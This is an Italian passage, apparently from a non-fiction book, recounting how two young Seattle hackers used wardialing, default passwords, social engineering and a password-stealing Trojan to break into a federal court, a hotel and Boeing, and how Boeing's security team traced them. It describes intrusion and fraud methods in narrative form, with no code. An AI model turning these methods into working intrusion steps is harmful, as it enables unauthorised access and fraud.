Oltre ai tuffi nella spazzatura e al phreaking telefonico, la 
coppia di amici lasciava i computer accesi in modalità wardia- 
ling, alla ricerca di modem che potevano essere collegati a si- 
stemi informatici in cui penetrare. Tra tutti e due, in una sola 
notte potevano riuscire a verificare milleduecento numeri di te- 
lefono. Con le macchine che chiamavano ininterrottamente, po- 
tevano scandagliare un intero prefisso telefonico nel giro di due 
o tre giorni. Quando tornavano alle macchine, l'elenco dei log 
mostrava loro da quali numeri di telefono avevano ottenuto ri- 
sposte. “Avevo lanciato il mio wardialer per scansionare un pre- 
fisso di Seattle, il 206-553,” racconta Matt. “Tutti quei numeri di 
telefono appartengono ad agenzie federali di qualche tipo. Così 
quel prefisso telefonico era di per sé un obiettivo sensibile per- 
ché era riservato ai computer del governo federale.” In realtà, i 
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due non avevano delle motivazioni particolari per monitorare le 
agenzie federali governative: 


costa: Eravamo solo dei ragazzini. Non avevamo un piano preordi- 
nato. 

MATT: Quello che facevamo era gettare la rete nel mare per vedere 
che tipo di pesci abboccavano. 

costa: Era più una cosa del tipo “che facciamo stasera?”, “cosa pos- 
so scansionare stanotte?”. 


Un giorno Costa diede un'occhiata ai log del suo wardialer e 
vide che il programma era entrato in un computer che rispon- 
deva con un avviso che recitava qualcosa del tipo: “Corte distret- 
tuale degli Stati Uniti”. Diceva anche: “Questa è proprietà fede- 
rale”. Costa pensò: “Tutto ciò è allettante”. 

Ma come entrare nel sistema? Avevano ancora bisogno di un 
nome utente e di una password. “Credo che fu Matt a indovinar- 
li,” dice Costa. La risposta era troppo facile: nome utente: “pu- 
blic”. Password: “public”. Così c'era questo “avviso molto forte e 
spaventoso” sul fatto che il sito era di proprietà federale, eppure 
nessuna misura di sicurezza reale che sbarrasse l’accesso. 

“Una volta che fummo dentro al sistema, prendemmo il file 
con le password,” dice Matt. Ottennero facilmente i nomi utenti 
e le password dei giudici. “I giudici potevano controllare il ca- 
lendario del tribunale e potevano consultare le informazioni sul- 
la giuria o le storie dei casi giudiziari.” 

Avendo percepito il rischio, Matt ricorda: “Non ci spingem- 
mo troppo oltre”. Almeno, non in quel momento. 


Ospiti dell'albergo 


Nel frattempo i due si davano da fare anche in altre aree. “Una 
delle cose che compromettemmo fu un’associazione di credito. 
Matt scoprì uno schema ricorrente nei numeri dei loro codici che 
ci permise di fare delle telefonate” a spese dell’associazione. Ave- 
vano anche dei piani per entrare nel sistema informatico del di- 
partimento della Motorizzazione civile “per vedere che tipo di pa- 
tenti e altre cose potevamo trovare”. 

Continuarono ad affinare le proprie capacità e a penetrare 
nei sistemi. “Entravamo in molti computer in città. Entravamo 
nei concessionari di automobili. Ah, c'era anche un albergo nel- 
l’area di Seattle. Li chiamai e mi spacciai per un tecnico infor- 
matico della società che aveva prodotto il software per le preno- 
tazioni dell'hotel. Parlai a una delle donne della reception e le 
spiegai che stavamo avendo delle difficoltà tecniche e che non 
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avrebbe potuto svolgere il suo lavoro correttamente se non si fos- 
se premunita e non avesse fatto alcuni di cambiamenti.” 

Con questa mossa standard, ben nota, di social engineering 
Matt scoprì facilmente le informazioni per entrare nel sistema. 
“Il nome utente e la password erano ‘hotel’ e ‘learn’.’ La confi- 
gurazione automatica inserita dagli sviluppatori del software non 
era mai stata cambiata. 

L'intrusione nei computer del primo hotel permise loro di ap- 
prendere il funzionamento di un pacchetto software per le pre- 
notazioni alberghiere che scoprirono essere assai diffuso. Quan- 
do, alcuni mesi dopo, i ragazzi presero di mira un altro albergo 
immaginarono che anche quello avrebbe potuto usare lo stesso 
software. E pensarono che l'albergo poteva servirsi della stessa 
configurazione automatica. Avevano ragione su entrambe le sup- 
posizioni. Come ricorda Costa: 


Entrammo nel computer dell'albergo. La schermata che vedevo era 
praticamente identica a quella che vedevano lì nell'albergo. Così en- 
trai e prenotai una suite, una delle migliori suite, da trecento dolla- 
ri a notte, con vista sullo specchio d’acqua, il bar interno e tutto il 
resto. 

Usai un nome falso e inserii una nota che sulla stanza era stato ver- 
sato un anticipo di cinquecento dollari in contanti. Prenotata per 
una notte di gran casino. Passammo tutto il fine settimana sul po- 
sto, facemmo festa e svuotammo il minibar. 


L'accesso al sistema informatico dell'hotel permise loro an- 
che di vedere le informazioni sugli ospiti che avevano soggior- 
nato nell'albergo, “comprese le informazioni finanziarie”. 

Prima di andarsene, i ragazzi si fermarono al banco della re- 
ception e cercarono di ottenere il resto del loro “anticipo in con- 
tanti”. Quando l'impiegato disse che l'albergo avrebbe spedito lo- 
ro un assegno, gli diedero un indirizzo falso e se ne andarono. 

“Non ci hanno mai arrestati per quella storia,” dice Costa, ag- 
giungendo, “speriamo che le restrizioni siano finite.” Qualche 
rimpianto? Non proprio. “In quella storia ci siamo un po' rifatti 
con il bar.” 


Aprire una porta 


Dopo il fine settimana selvaggio, i ragazzi fecero ritorno bal- 
danzosi ai loro computer per vedere cos'altro avrebbero potuto 
fare con hack nella Corte distrettuale. Scoprirono rapidamente 
che il sistema operativo del computer del tribunale era stato ac- 
quistato da un'azienda che chiameremo Subsequent. Il software- 
aveva una caratteristica incorporata che faceva partire una te- 
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lefonata alla Subsequent ogni volta che c'era bisogno di nuove 
patch per il software. Per esempio, “se un cliente di un compu- 
ter della Subsequent acquistava un firewall e il sistema operati- 
vo richiedeva delle patch perché il firewall potesse funzionare, la 
società aveva un metodo per fare entrare il cliente nel proprio si- 
stema aziendale e scaricare le patch. Questo è il modo in cui fun- 
zionava all’epoca”, spiega Costa. 

Matt aveva un amico, anch'egli programmatore C, che sape- 
va come realizzare un Trojan, un software che consente a un 
hacker di entrare di nascosto in un computer in cui è già entra- 
to in precedenza. Un software molto comodo quando le password 
vengono cambiate o vengono prese altre misure per bloccare l’ac- 
cesso. Tramite il computer della Corte distrettuale, Matt inviò il 
Trojan ai computer della Subsequent. Il software era stato scrit- 
to in modo tale che avrebbe anche “catturato tutte le password e 
le avrebbe registrate in un file segreto, oltre a permetterci un in- 
gresso alternativo di root (accesso da amministratore) nel caso 
fossimo stati tagliati fuori”. 

Entrare nel computer della Subsequent portò loro un van- 
taggio inaspettato: l’accesso a un elenco di compagnie che usa- 
‘vano lo stesso sistema operativo della Subsequent. Oro puro. “Ci 
diceva a quali altre macchine potevamo accedere.” Una delle com- 
pagnie citate sulla lista era un gigante dell'industria locale, il po- 
sto in cui lavorava il padre di Matt: la Boeing Aircraft. 

“Ottenemmo il nome utente e la password di un ingegnere 
che funzionava sulle caselle che aveva venduto alla Boeing. Sco- 
primmo che potevamo accedere al log-in e alla password di tut- 
te le caselle della Boeing,” dice Costa. 

La prima volta che Matt chiamò il numero di telefono per le 
connessioni esterne al sistema della Boeing, gli capitò un colpo 
di fortuna. 


L'ultima persona che aveva chiamato non aveva sconnesso il modem 
nel modo giusto così quando mi collegai aprii una sessione come se 
fossi uno degli utenti. Mi ritrovai con la shell di Unix di un tipo e fu 
come: “Wow, sto calcando le impronte del tipo”. 


(Alcuni modem dial-up di prima generazione non erano con- 
figurati, così sconnettevano automaticamente il sistema quando 
l'utente riagganciava. Da giovane, ogni volta che mi imbattevo in 
questo tipo di configurazioni facevo cadere la connessione del- 
l'utente inviando un comando al commutatore della compagnia 
telefonica o facendo del social engineering con un tecnico della 
compagnia telefonica per far interrompere la connessione. Una 
volta che la connessione era stata interrotta, potevo collegarmi e 
usare l'account che era attivo al momento della caduta della con- 
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nessione. Matt e Costa, dal canto loro, si erano imbattuti sem- 
plicemente in una connessione ancora attiva.) 

Avere una shell di Unix voleva dire che erano dentro al fi- 
rewall, con il computer che era a tutti gli effetti pronto a riceve- 
re istruzioni. Matt: 


Così andai avanti e craccai la sua password, quindi la usai su alcu- 
ne macchine locali dove potevo avere l’accesso di root [da ammini- 
stratore]. Una volta che avevo la root, potevamo usare l'account di 
qualcun altro e cercare di andare su altre macchine cui queste per- 
sone avevano accesso guardando alla storia della loro shell. 


Se era stata una coincidenza che il modem fosse online quan- 
do Matt aveva chiamato, quello che stava accadendo alla Boeing 
quando Matt e Costa iniziarono la loro intrusione nella compa- 
gnia era una coincidenza ancora maggiore. 


Controllare le barricate 


In quel momento, la Boeing stava ospitando un seminario di al- 
to livello sulla sicurezza informatica per un pubblico di dipenden- 
ti delle corporation, agenti di polizia, del Fbi e del Secret Service. 

A coordinare la sessione era Don Boelling, un uomo che co- 
nosceva da vicino le misure di sicurezza informatica della Boeing 
e gli sforzi per migliorarle, e che aveva combattuto le battaglie 
interne sulla sicurezza per molti anni. “La nostra rete e la nostra 
sicurezza informatica erano come dappertutto: pressoché nulle. 
Ed ero molto preoccupato per questo.” 

Già nel 1998, quando lavorava all’appena nata Boeing Elec- 
tronics, Don aveva partecipato a un incontro con il presidente e 
diversi vicepresidenti della divisione e aveva detto loro: “Guar- 
date cosa posso fare con la vostra rete”. Aveva hackerato le linee 
collegate tramite modem e aveva dimostrato loro che non c'era- 
no password. Era andato avanti dimostrando che avrebbe potu- 
to attaccare tutte le macchine che voleva. I dirigenti videro che 
su un computer dopo l’altro compariva un account da guest con 
la password “guest”. Don gli dimostrò come un account come 
quello rendesse facile l’accesso al file delle passworde il suo down- 
load su una qualsiasi altra macchina, anche una al di fuori della 
compagnia. 

Aveva fatto valere le sue ragioni. “Quella dimostrazione per- 
mise l’avvio del programma di sicurezza alla Boeing,” ci raccon- 
ta Don. Ma il programma era ancora in fase embrionale quando 
Matt e Costa iniziarono le loro incursioni. Per Don era stato “dif- 
ficile convincere i dirigenti a investire veramente delle risorse e 
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dei fondi nella sicurezza.” L'episodio di Matt e Costa si sarebbe 
dimostrato “il caso che li convinse al posto mio”... 

Il suo ruolo coraggioso come portavoce della sicurezza ave- 
va portato all’organizzazione da parte di Don di un seminario al- 
la Boeing di indagine scientifica in ambito informatico assoluta- 
mente innovativo. “Un funzionario del governo ci aveva chiesto 
se volevamo dare una mano ad avviare un gruppo misto forma- 
to da rappresentanti dell'industria e delle forze di polizia per pro- 
durre delle informazioni. L'organizzazione era concepita per fa- 
vorire la formazione di agenti di polizia per le indagini tecnolo- 
giche della scientifica che comportavano tecniche di indagine hi- 
tech. Parteciparono rappresentanti della Microsoft, la compagnia 
telefonica Us West, un paio di banche e diverse organizzazioni 
finanziarie. Vennero anche degli agenti del Secret Service per 
condividere la loro conoscenza sugli aspetti hi-tech della con- 
traffazione.” 

Don riuscì a ottenere dalla Boeing la sponsorizzazione del- 
l'evento, che fu tenuto in uno dei centri di formazione informa- 
tica della compagnia. “A ciascuno dei corsi settimanali su come 
sequestrare un computer, come scrivere un mandato di perqui- 
sizione, come condurre indagini scientifiche su un computer, e 
tutto il resto, parteciparono circa trentacinque ufficiali di poli- 
zia. Partecipò anche Howard Schmidt, che fu reclutato in segui- 
to dalla forza di polizia dell'Homeland Security, che risponde di- 
rettamente al presidente sul cybercrimine.” 

Il secondo giorno di corso, il cercapersone di Don squillò. “Ri- 
chiamai l’amministratrice, Phillys, che mi disse: ‘Sta accadendo 
qualcosa di strano su questa macchina che non riesco a capire 
bene’.” Spiegò che c'erano un certo numero di directory nasco- 
ste che sembravano contenere delle password. E un programma 
chiamato Crack stava girando sullo sfondo. 

Non era una buona notizia. Crack è un programma proget- 
tato per penetrare la cifratura delle password. Fa dei tentativi con 
un elenco di parole o con l'indice di un dizionario, o con la per- 
mutazione di parole come Billi, Bill2, Bill3, per cercare di indi- 
viduare la password. 

Don inviò il suo socio, Ken (“il nostro guru sulla sicurezza di 
Unix”) a dare un’occhiata. Dopo circa un'ora Ken fece uno squil- 
lo a Don e gli disse: “Faresti meglio a venire su. La situazione 
sembra piuttosto pesante. Abbiamo diverse password craccate 
che non appartengono alla Boeing. Ce n'è una in particolare cui 
dovresti veramente dare uno sguardo”. 

Nel frattempo, Matt aveva lavorato sodo nella rete della 
Boeing. Dopo aver ottenuto l’accesso con i privilegi da ammini- 
stratore di sistema, “era stato facile arrivare ad altri account dan- 
do uno sguardo alle altre macchine cui queste persone avevano 
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accesso”. Questi file contenevano spesso dei numeri di telefono 
di venditori di software e di altri computer che la macchina po- 
teva chiamare. “Era una directory primitiva di altri host che era- 
no là fuori,” dice Matt. Rapidamente i due hacker erano entrati 
nei database di una gran varietà di aziende. “Avevamo messo le 
mani in molti posti,” dice Costa. 

Non volendo lasciare il seminario, Don chiese a Ken di faxa- 
re ciò che stava vedendo sullo schermo dell’amministratore. 
Quando la trasmissione fu completa, Don fu sollevato dal non ri- 
conoscere nessuno degli identificativi degli utenti. Tuttavia, era 
sconcertato dal fatto che molti di loro iniziassero con “giudice”. 
Poi capì. 


Pensai: “Mio Dio!”. Entrai nella classe piena di agenti di polizia e 
dissi: “Ragazzi, riconoscete qualcuno di questi nomi?”. Lessi una li- 
sta di nomi. Un agente federale spiegò: “Sono giudici della Corte di- 
strettuale di Seattle”. E aggiunsi: “Bene, io ho un file di password 
con ventisei password craccate”. I federali presenti diventarono qua- 
si verdi. 


Don vide un agente del Fbi con cui aveva lavorato in passato 
fare alcune telefonate: 


Chiama la Corte distrettuale c si fa passare l'amministratore di si- 
stema. Riesco a sentire la voce di questo tipo dall'altra parte della li- 
nea che dice: “No, assolutamente no. Non siamo connessi a Inter- 
net. Non possono avere i nostri file con le password. Non può esse- 
re la nostra macchina”. E Rich risponde: “No, è proprio la vostra 
macchina”. Abbiamo i file”. E il tipo risponde: “No, non può acca- 
dere. Nessuno può accedere alle nostre macchine”, 


Don scorse la lista nelle sue mani e vide che la password di 
root ~ la password di massimo livello conosciuta solo agli am- 
ministratori di sistema — era stata craccata. La indicò a Rich: 


Rich dice al telefono: “È tua la password di root ‘2ovens’?”. Silenzio 
tombale dall’altra parte della linea. Tutto quello che sentimmo fu un 
“thunk” della testa del tipo che batteva contro il tavolo. 


Quando fece ritorno in classe, Don sentì un certo fermento. 
“Dissi: ‘Bene, ragazzi, è arrivato il momento di fare un po’ di for- 
mazione al lavoro dal vivo.” 

Con una parte della classe che lo seguiva senza essere stata in- 
vitata, Don si preparò alla battaglia. Innanzitutto andò al centro 
informatico di Bellevue, dove si trovava il firewall. “Scoprimmo 
l'account che stava gestendo il programma Crack, quello da cui lu- 
tente entrava e usciva, e gli indirizzi Ip da cui proveniva.” 
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In quel momento ormai, con il programma di craccaggio del- 
le password che girava sul computer della Boeing, i due hacker 
si erano spostati nel resto del sistema della Boeing, “spiderando”! 
per entrare in centinaia di macchine della Boeing. 

Uno dei computer cui il sistema della Boeing si collegava non 
era nemmeno a Seattle. Anzi, si trovava sulla costa opposta. Se- 
condo Costa: 


Era uno dei laboratori informatici dei jet a propulsione dei Langley 
Research Labs della Nasa in Virginia, un Cray Ymp5, uno dei gioiel- 
li. Quello fu uno dei passaggi cruciali. Ti vengono in mente ogni ge- 
nere di cose. Alcuni dei segreti potevano rendermi ricco o morto o 
pesantemente colpevole. 


Le persone al seminario facevano i turni per seguire tutta la- 
nimazione nel centro informatico. Rimasero di stucco quando la 
squadra addetta alla sicurezza scoprì che gli intrusi erano entra- 
ti nel Cray. Don stentava a crederci: “Riuscimmo a identificare 
molto rapidamente, nel giro di un'ora o due, quel punto di ac- 
cesso e i punti d’accesso al firewall”. Nel frattempo, Ken piazzò 
delle trappole virtuali sul firewall in modo da determinare quali 
altri account gli intrusi avevano violato. 

Don chiamò la compagnia telefonica locale e chiese loro di 
installare delle “trappole” per tracciare le linee della Boeing do- 
tate dei modem usati dagli intrusi. Con questo metodo avrebbe- 
ro registrato i numeri di telefono da cui provenivano le chiama- 
te. Gli addetti della compagnia acconsentirono senza esitazioni. 
“Facevano parte della nostra squadra, sapevano chi ero e non fe- 
cero domande. È uno dei vantaggi del far parte di una di queste 
squadre di law enforcement.” 

Don inserì alcuni computer portatili nei circuiti tra imodem 
e i computer, “fondamentalmente per archiviare tutti i tasti digi- 
tati in un file”. Collegò persino delle stampanti Okidata a ognu- 
na delle macchine “per stampare tutto quello che facevano in tem- 
po reale. Ne avevo bisogno come prova. Non puoi mettere in di- 
scussione quello che viene stampato allo stesso modo in cui puoi 
farlo con un file elettronico”. Forse non è così sorprendente, se 
si pensa a cosa sia più credibile per una commissione di giurati: 
un file elettronico, o un documento stampato al momento esat- 
to dell'incidente. 

Il gruppo fece ritorno al seminario per qualche ora, dove Don 
illustrò la situazione e le misure difensive adottate. Gli ufficiali 


! Il verbo spiderare può essere riferito agli spider automatici dei motori di ri- 
cerca, ma anche al modo di passare da un host all’altro manualmente, seguendo 
i link interni. [N.d.7.] o 
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delle agenzie di polizia stavano facendo un'esperienza applicata, 
di livello universitario, di indagine scientifica in campo infor- 
matico. “Tornammo sul posto per fare altro lavoro e controllare 
quello che avevamo in mano, e mentre mi trovavo lì con due agen- 
ti federali e il mio socio, il modem iniziò a suonare. Bingo. I tipi 
erano entrati, registrandosi con l'account,” racconta Don. 

La compagnia telefonica locale tracciò Matt e Costa fino a ca- 
sa loro. La squadra guardò gli hacker che entravano nel firewall. 
Poi si trasferirono all’Università di Washington, dove entrarono 
nell’account di Matt Anderson. 

Matt e Costa avevano preso delle precauzioni che pensavano 
li avrebbero protetti dall'essere rintracciati. Per esempio, invece 
di comporre il numero della Boeing direttamente, chiamavano i 
computer della Corte distrettuale e poi reindirizzavano la chia- 
mata dalla Corte alla Boeing. Avevano pensato che “se c'è qual- 
cuno che ci sta monitorando alla Boeing, sarà difficile per loro 
capire da dove arrivi la telefonata”, racconta Costa. 

Non avevano idea che ogni loro mossa veniva osservata e re- 
gistrata mentre Matt chiamava la Corte, da lì passava alla Boeing 
per poi trasferirsi al suo account personale da studente: 


Poiché eravamo appena entrati nel sistema [della Corte distrettua-. 
le] e la password e il nome utente erano “public”, in quel momento 
non pensai che fosse una minaccia, o lo trascurai. Quella chiamata 
diretta è ciò che permise loro di rintracciarmi nel mio appartamen- 
to e quello è il punto in cui tutto andò in malora. 


Il gruppo di Don si sentiva come la proverbiale mosca sul mu- 
ro nel momento in cui Matt iniziò a leggere l'e-mail sul suo ac- 
count da studente: “Nella casella di posta dell’utente c’era tutta 
una serie di cose sui loro exploit da hacker e le risposte di altri 
hacker”. 


Gli ufficiali di polizia sono lì seduti che si spanciano dalle risate, per- 
ché questi sono di fatto dei ragazzini arroganti, che non hanno con- 
siderato che sarebbero stati beccati. E non sanno che noi li stiamo 
guardando in tempo reale, e ci forniscono le prove dritti nelle no- 
stre mani. 


Nel frattempo, Don strappava i fogli dalla stampante, chie- 
deva a tutti di firmarli in qualità di testimoni e li sigillava come 
prova. “In meno di sei ore dal momento in cui eravamo venuti a 
conoscenza dell’intrusione, avevamo già preso questi signori per 
violazione di proprietà privata.” 

I dirigenti della Boeing non avevano niente da ridere. “Era- 
no completamente fuori di sé per la paura e volevano che gli 
hacker fossero messi in condizione di non nuocere: ‘Escludeteli 


100 


dalle nostre macchine e finiamola ora’. “Don riuscì a convincer- 
li che sarebbe stato più saggio aspettare. “Dissi loro: ‘Non sap- 
piamo in quanti posti sono stati. Abbiamo bisogno di monitorarli 
per un pọ’ per scoprire cosa diavolo sta succedendo e quello che 
hanno fatto’.” Se si considerano i rischi che ciò comportava, l'a- 
ver convinto il management a lasciarli fare fu una testimonian- 
za notevole delle capacità professionali di Don. 


Sotto sorveglianza 


Uno degli agenti federali che seguiva il seminario ottenne dei 
mandati di perquisizione per mettere sotto sorveglianza le linee 
telefoniche di Matt e Costa. Ma le intercettazioni erano solo una 
parte del lavoro. Ora il governo federale stava prendendo il ca- 
so molto seriamente. L'azione aveva assunto le sembianze di un 
film di spionaggio o di un thriller: furono spediti al campus del- 
le squadre di agenti del Fbi. Fingendosi studenti, seguirono Matt 
in giro per il campus, osservando le sue azioni in modo da po- 
ter poi testimoniare che stava usando un computer particolare 
del campus in un determinato momento. Altrimenti sarebbe sta- 
to facile per lui dichiarare: “Non ero io, ci sono tante persone 
che usano quella macchina ogni giorno”. Era già accaduto in 
passato. 

Da parte della Boeing, la squadra addetta alla sicurezza pre- 
se ogni precauzione immaginabile. Lo scopo non era di tenere 
fuori iragazzi, ma di seguirli da vicino, continuando a raccogliere 
prove, assicurandosi al contempo che non facessero alcun dan- 
no. Spiega Don: “Avevamo tutti i punti principali di ingresso al- 
le nostre macchine configurati in modo tale che l'amministrato- 
re di sistema o il computer stesso ci potevano avvisare per farci 
sapere che tipo di attività era in corso”, Il beep del cercapersone 
si trasformò in una chiamata “ai posti di combattimento”. I com- 
ponenti della squadra contattavano immediatamente alcune per- 
sone inserite su una lista di preavviso perinformarle che gli hacker 
erano di nuovo in cerca di qualcosa. Diverse volte il gruppo di 
Don seguì l’attività di Matt e Costa tramite Internet, passo dopo 
passo, fino all’Università di Washington, dove era stato istruito il 
personale chiave. Rimasero alle loro costole sin dal momento in 
cui iniziarono l'intrusione. 

Don decise di tenerli sotto osservazione per altri quattro o 
cinque giorni perché “di fatto riuscivamo a contenerli piuttosto 
bene, e non facevano nulla che consideravo estremamente peri- 
coloso, anche se avevano un accesso di alto livello e avrebbero 
potuto farlo se avessero voluto”, i 

Ma Costa si accorse presto che stava succedendo qualcosa: 
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Una sera io e la mia ragazza eravamo nel mio appartamento a guar- 
dare la tv. Era una sera d’estate e la finestra era aperta, ed è curioso 
perché lei guardò fuori... e notò una macchina nel parcheggio della 
Pay & Save. Beh, circa umora dopo, guardò di nuovo fuori e disse: 
“C'è una macchina fuori con dei tipi dentro che era lì già un'ora fa”. 


Costa spense la tv e le luci e iniziò a riprendere gli agenti del 
Fbi che tenevano il suo posto sottocchio. Un po’ più tardi, vide 
una seconda macchina che si fermava vicino alla prima. Gli uo- 
mini nelle due macchine discussero qualcosa e poi si allonta- 
narono. 

Il giorno dopo, una squadra di ufficiali di polizia si presentò 
all'appartamento di Costa. A domanda, risposero che non aveva- 
no un mandato, ma Costa voleva mostrarsi cooperativo e così non 
obiettò a essere interrogato. Non obiettò neanche quando gli chie- 
sero di telefonare a Matt e lo invitarono a parlare liberamente 
delle loro attività attraverso i cellulari mentre registravano la con- 
versazione. 

Perché voleva chiamare il suo migliore amico per parlare di 
attività illegali con degli agenti di polizia in ascolto? Semplice: 
scherzando una notte, e giocando a una variazione di “Che cosa 
succederebbe se?” i due avevano prefigurato veramente una si- 
tuazione in cui avrebbe potuto essere rischioso parlare libera- 
mente, e avevano escogitato un codice. Se uno dei due avesse det- 
to “nove, dieci” nel corso della conversazione, ciò avrebbe signi- 
ficato “Pericolo! Attento a quello che dici.” Avevano scelto il nu- 
mero più facile da ricordare, cioè uno di meno del numero per le 
chiamate di emergenza (911). 

Così, con il telefono sotto controllo e il registratore acceso, 
Costa chiamò Matt. “Ti ho chiamato pochi minuti fa, alle 9 e 10, 
ma non sono riuscito a prendere la linea,” esordì. 


Chiudere il cerchio 


La squadra di sorveglianza della Boeing aveva scoperto an- 
che che gli hacker non solo erano entrati nella Corte distrettua- 
le, ma anche nell’Agenzia per la protezione ambientale [Envi- 
ronmental Protection Agency, o Epa]. 

Don Boelling si recò all’Epa con la cattiva notizia. Come l'am- 
ministratore di sistema della Corte distrettuale, i dipendenti del- 
l’Epa erano scettici su una qualsiasi violazione del loro sistema: 


Gli dicevamo che le loro macchine erano compromesse e per loro 
era inconcepibile. Rispondevano: “No, no”. Siccome mi era capita- 
to di portarmi dietro il file delle password con dieci o quindici pass- 
word craccate, le enunciai all’amministratore di sistema. 
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Stavano lì lì per dare di stomaco perché si è scoperto che tutte e sei- 
cento le macchine che hanno negli Stati Uniti sono collegate a In- 
ternet tramite lo stesso account. Era un account di root che dava dei 
privilegi di sistema e avevano tutte la stessa password. 


Gli agenti di polizia che seguivano il seminario sulla sicurez- 
za informatica stavano ricevendo molte più informazioni rispet- 
to a quello che avevano pagato. “Per coloro che non ci seguiva- 
no sul campo,” ricorda Don, “tornavamo ogni giorno in classe e 
facevamo loro un resoconto dettagliato. Ricevevano un rappor- 
to di prima mano su tutto quello che stava accadendo nel caso.” 


Il passato riemerge 


Siccome era rimasto colpito dalle capacità che gli hacker ave- 
vano dimostrato, Don fu sorpreso nell'apprendere che i due era- 
no finiti in tribunale solo due mesi prima con altre accuse, che 
avevano portato a una condanna per Costa a trenta giorni di la- 
voro fuori dal carcere. 

Eppure eccoli che infrangevano di nuovo la legge come se si 
sentissero invulnerabili. Come era possibile? Costa spiega che lui 
e Matt erano già preoccupati perché nel primo caso giudiziario 
Cerano molte più cose di quelle scoperte dai pubblici ministeri: 


Era come una grande palla di neve di cui avevano trovato solo un 
piccolo pezzo di ghiaccio. Non sapevano che stavamo facendo i cel- 
lulari, non sapevano che avevamo dei numeri di carte di credito e 
non conoscevano il nostro vero scopo nella storia per cui ci aveva- 
no beccato. Poiché Matt e io avevamo già parlato del nostro caso, 
discutemmo di quello che gli avremmo detto. E così avevamo am- 
messo solo questa infiltrazione in un computer e per noi era stato 
come farsi due risate. Fu una cosa stupida. 


Sui telegiornali 


Don stava guidando da Bellevue alla sede della Boeing di South 
Central, dove si trovava il suo ufficio, quando gli prese un colpo. 
“Ascoltavo il notiziario della Kiro quando all'improvviso arriva 
questa notizia che due hacker sono penetrati nella Boeing e che 
c'è un'indagine in corso. Penso: ‘Merda!’.” 

Don avrebbe scoperto in seguito che la fuga di notizie era do- 
vuta a un dipendente della Boeing che non era stato contento del- 
la decisione di monitorare le attività di Matt e Costa anziché ar- 
restarli immediatamente. Don corse nel suo ufficio e convocò tut- 
te le persone coinvolte: “Dissi: ‘Guardate, è uscita tutta la storia! 
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»» 


È sui telegiornali! Dobbiamo fare qualcosa subito’. Howard 
Schmidt si trovava sul posto ed essendo un esperto nella reda- 
zione dei mandati di perquisizione per computer, si fece avanti e 
li aiutò in modo che fosse scritto correttamente e non vi fosse al- 
cuna domanda a riguardo. 

In realtà, Don non era troppo contrariato per la fuga. “Era- 
vamo comunque molto vicini a prenderli. Avevamo moltissime 
prove, tonnellate di prove sui ragazzi.” Ma sospettava che vi fos- 
sero anche altre cose che non erano ancora venute alla luce: “C’e- 
rano un pọ’ di cose che pensavamo stessero facendo, come la fro- 
de di carte di credito. Furono presi per frode più tardi. Credo fu 
sei mesi o un anno dopo che il Secret Service li aveva beccati”. 


Arrestati 


Costa sapeva che sarebbero arrivati presto e non fu sorpreso 
dai colpi pesanti sferrati alla porta del suo appartamento. In quel 
momento si era già liberato di quattro portatili zeppi di prove in- 
criminanti. Non sapeva ancora che, grazie a Don Boelling, i fe- 
derali avevano tutte le prove di cui avevano bisogno per arresta- 
re lui e Matt. 

Matt ricorda di aver sentito la notizia di una violazione dei 
computer della Boeing da un telegiornale a casa dei suoi genito- 
ri. Attorno alle 10 di sera, bussarono alla porta di casa. Erano due 
agenti del Fbi. Lo interrogarono nella sala da pranzo per circa 
due ore mentre i suoi genitori dormivano al piano di sopra. Matt 
non voleva svegliarli. Aveva paura di farlo. 

Don Boelling avrebbe seguito gli arresti se avesse potuto. No- 
nostante i buoni rapporti che aveva con la polizia, non fu invita- 
to. “Non erano troppo disposti ad avere intorno dei civili al mo- 
mento della cattura.” 

La Boeingera preoccupata del fatto che uno degli hacker aves- 
se lo stesso cognome di un suo dipendente. Matt non fu conten- 
to di vedere suo padre coinvolto in quel casino: “Siccome papà 
lavorava alla Boeing e abbiamo lo stesso cognome venne inter- 
rogato”. Costa si affrettò a spiegare che erano stati molto attenti 
a non entrare nel sistema della Boeing usando le informazioni 
del padre di Matt: “Tenne suo padre completamente fuori dalla 
storia e non volle coinvolgerlo sin dall'inizio, da prima che ca- 
pissimo che saremmo finiti nei guai”. 

Don fu un po’ irritato quando un agente speciale dell'ufficio 
del Fbi di Seattle venne intervistato dopo la fuga di notizie. Uno 
dei giornalisti televisivi gli chiese come avevano rintracciato e 
preso gli hacker. L'agente rispose qualcosa del tipo: “Il Fbi ha 
usato delle procedure e delle tecniche d'indagine troppo com- 
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plicate perché possano essere discusse in questa sede”. Don pen- 
sò: “Siete pieni di merda! Non avete fatto niente! L'abbiamo fat- 
to noi!”. Era stato impegnato un gruppo di lavoro coordinato, 
con personale della Boeing, di altre compagnie, della Corte di- 
strettuale e di varie agenzie di polizia locali, statali e federali. 
“Era la prima volta che facevamo una cosa del genere. Fu un la- 
voro di squadra.” 

Fortunatamente, Matte Costa avevano fatto pochi danni, con- 
siderando i disastri che avrebbero potuto causare. “Dal punto di 
vista dei danni reali alla Boeing non avevano fatto molto,” rico- 
nosce Don. La compagnia ne uscì facilmente, ma voleva essere 
sicura che la lezione fosse appresa. “Si dichiararono colpevoli 
perché di fatto li avevamo colti in flagrante. Non c'era modo per 
loro di tirarsi fuori,” ricorda Don con soddisfazione. 

Ma ancora una volta le accuse furono riconsiderate, questa 
volta diversi capi di imputazione penali furono ridotti alla sem- 
plice “violazione informatica”. I due ne uscirono con un'altra pu- 
nizione formale: duecentocinquanta ore di servizi sociali e cin- 
que anni di libertà vigilata senza permesso di usare un compu- 
ter. La parte più dura furono i risarcimenti: fu ordinato loro di 
pagare trentamila dollari, la maggior parte dei quali alla Boeing. 
Anche se nessuno dei due era più un ragazzino, fu data loro un’al- 
tra chance. L'ultima. 

Ma non avevano imparato la lezione. 


costa: Da stupidi ragazzini che eravamo — o non proprio stupidi ma 
ingenui per il fatto che non avevamo realizzato in quanti guai avrem- 
mo potuto finire — non ci fermammo completamente. Non fu vera- 
mente avidità, ma più il glamour di avere un cellulare e usarlo a vo- 
lontà. 

MATT: A quel tempo era una cosa grossa. Era veramente un prodot- 
to da ostentare. 


Ma le sospensioni che il sistema di giustizia penale aveva con- 
cesso a Matt e Costa stavano per esaurirsi. E la causa non era le- 
gata ad alcuna delle ragioni che avrebbero potuto immaginare 
ma, tra tutte le cose possibili, la gelosia. 

Costa dice che la sua ragazza di allora pensava che lui la stes- 
se tradendo con un’altra donna. Niente del genere, dice Costa; 
l’altra donna “era solo un'amica, nulla di più”. Costa è convinto 
che un bel giorno, non avendo rinunciato a vedere amica chiamò 
le autorità dicendo: “Gli hacker della Boeing stanno vendendo 
computer rubati”. 

